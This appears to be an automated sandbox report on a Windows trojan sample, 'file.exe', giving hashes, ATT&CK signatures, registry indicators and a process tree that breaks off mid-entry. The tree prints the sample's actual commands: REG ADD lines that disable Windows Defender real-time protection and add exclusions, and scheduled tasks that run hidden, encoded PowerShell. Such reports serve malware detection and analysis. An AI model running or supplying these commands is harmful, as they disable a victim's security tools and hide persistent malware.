305c76854134bc11e6851fec9854bdec38940be4bcda4de60391054fa3ca3070

Analysis

max time kernel
150s
max time network
157s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
04/10/2022, 02:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

f49e4d425a3c5f64535f022d3aec51c9
SHA1

7a4e965c8cf5ec794ecdfddb433b6a9c3c4efbb4
SHA256

305c76854134bc11e6851fec9854bdec38940be4bcda4de60391054fa3ca3070
SHA512

b94656b3e2f9534f66a61aaa8fdc62f07cf8a46bf827940cb58b806a8cdfe921a88f96f2cfbbcebe98f2010c9ff8bc16891cd6bb6ebd360961a732efdb1874e7
SSDEEP

196608:91OWn/bQ4cKnYlLPXKCoVmLxMqq8IoG2VTj8z+jbU:3OWnTQuYxPXK76MD87nn8yjg

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1388	Install.exe
1784	Install.exe
1292	HSUNJNy.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1048	file.exe
1388	Install.exe
1388	Install.exe
1388	Install.exe
1388	Install.exe
1784	Install.exe
1784	Install.exe
1784	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HSUNJNy.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	HSUNJNy.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HSUNJNy.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1992	schtasks.exe
668	schtasks.exe
856	schtasks.exe
1040	schtasks.exe
1892	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1528	powershell.EXE
1528	powershell.EXE
1528	powershell.EXE
1708	powershell.EXE
1708	powershell.EXE
1708	powershell.EXE
1696	powershell.EXE
1696	powershell.EXE
1696	powershell.EXE
2012	powershell.EXE
2012	powershell.EXE
2012	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1528	powershell.EXE
Token: SeDebugPrivilege	1708	powershell.EXE
Token: SeDebugPrivilege	1696	powershell.EXE
Token: SeDebugPrivilege	2012	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1048 wrote to memory of 1388	1048	file.exe	27
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1388 wrote to memory of 1784	1388	Install.exe	28
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 1156	1784	Install.exe	30
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1784 wrote to memory of 2040	1784	Install.exe	32
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 1156 wrote to memory of 1544	1156	forfiles.exe	34
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 2040 wrote to memory of 576	2040	forfiles.exe	35
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 1544 wrote to memory of 1492	1544	cmd.exe	36
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 576 wrote to memory of 1552	576	cmd.exe	37
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 1544 wrote to memory of 1772	1544	cmd.exe	38
PID 576 wrote to memory of 632	576	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Users\Admin\AppData\Local\Temp\7zSD79.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Users\Admin\AppData\Local\Temp\7zS11BD.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1544
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1492
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1772
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2040
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:576
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1552
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:632
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "geocUpibE" /SC once /ST 00:56:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1992
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "geocUpibE"
      4⤵
      PID:1324
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "geocUpibE"
      4⤵
      PID:1936
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 02:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\HSUNJNy.exe\" sw /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:668

C:\Windows\system32\taskeng.exe
taskeng.exe {E33DB15E-D42F-4D8F-8FBF-F5AEF7FD41A9} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:2004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1528
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1792

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1596

C:\Windows\system32\taskeng.exe
taskeng.exe {1C569202-D7B9-4F21-BB71-717EF7D0A277} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:764
- C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\HSUNJNy.exe
  C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\HSUNJNy.exe sw /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1292
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gfdIFnBLK" /SC once /ST 00:49:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:856
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gfdIFnBLK"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gfdIFnBLK"
    3⤵
    PID:860
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1312
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gBkXwaeZK" /SC once /ST 01:45:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1040
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gBkXwaeZK"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gBkXwaeZK"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1180
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:900
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1216
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:960
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\nAoAUnmm\tXFNhHbUZaZqCtdi.wsf"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\nAoAUnmm\tXFNhHbUZaZqCtdi.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:668
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:568
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:992
  - - C:\Windows\SysWOW64\reg.exe
